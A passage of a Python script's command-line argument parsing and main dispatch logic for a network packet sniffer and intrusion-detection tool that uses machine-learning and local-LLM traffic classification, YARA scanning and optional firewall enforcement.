parser.add_argument("--llm-model-path", type=str, default="",
help="Explicit path to a local .gguf file (overrides --llm-model auto-download)")
parser.add_argument("--enforce", action="store_true",
help="Actually apply firewall block rules (default: dry-run, log only)")
parser.add_argument("--eval", action="store_true",
help="Run the AI evaluation harness (precision/recall on the labeled corpus) and exit")
parser.add_argument("--no-llm", action="store_true",
help="In --eval, skip the (slow) local-LLM rows")
parser.add_argument("--show-errors", action="store_true",
help="In --eval, print LLM misclassifications")
parser.add_argument("--xdp", action="store_true",
help="Enable XDP (Express Data Path) to gather additional packet metadata")
parser.add_argument("--expensive", action="store_true",
help="Use LLM to analyze all packets in realtime (expensive mode)")
parser.add_argument("--yara-rules", type=str, default="",
help="Path to YARA rules file for signature scanning")
parser.add_argument("--carve-dir", type=str, default="carved_objects",
help="Directory where carved files/objects are written")
parser.add_argument("-v", "--verbosity", type=str, default="INFO",
help="Logging level (DEBUG, INFO, WARNING, ERROR)")
return parser.parse_args()
if __name__ == "__main__":
args = parse_arguments()
args.whitelist = set(code.strip().upper() for code in args.whitelist.split(','))
logging_level = getattr(logging, args.verbosity.upper(), logging.INFO)
setup_logging("logging.yaml")
logging.getLogger().setLevel(logging_level)
logger = logging.getLogger(__name__)
if args.install:
ok = install_dependencies(logger=logger)
raise SystemExit(0 if ok else 1)
if args.eval:
if np is None:
logger.error("--eval requires numpy and scikit-learn. Run with --install first.")
raise SystemExit(1)
run_eval(args, logger=logger)
raise SystemExit(0)
missing_runtime_deps = get_missing_runtime_dependencies()
if missing_runtime_deps:
logger.error(
"Missing required dependencies: %s. Run with --install first.",
", ".join(missing_runtime_deps)
)
raise SystemExit(1)
if args.build_dataset:
if not args.interface and args.start:
try:
args.interface = auto_detect_interface(logger=logger)
except Exception as exc:
logger.error("--start failed to auto-detect an interface: %s", exc)
raise SystemExit(1)
if not args.interface:
logger.error("Dataset mode requires --interface or --start for auto-detection")
raise SystemExit(1)
build_dataset_main(args.interface, args.num_samples, args.dataset_out, args.llm_label,
logger=logger, args=args)
elif args.train:
if not args.dataset:
logger.warning("No --dataset given; training a demo model on the built-in corpus. "
"For production, capture+label real traffic with "
"--build-dataset --llm-label, then --train --dataset <csv>.")
train_ml_model(model_output_path=args.model_path, csv_path=args.dataset, logger=logger)
else:
if args.start and not args.interface:
try:
args.interface = auto_detect_interface(logger=logger)
except Exception as exc:
logger.error("--start failed to auto-detect an interface: %s", exc)
raise SystemExit(1)
if not args.interface:
logger.error("Sniffer mode requires --interface or --start for auto-detection")
raise SystemExit(1)
sniffer = PacketSniffer(args)
sniffer.run()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment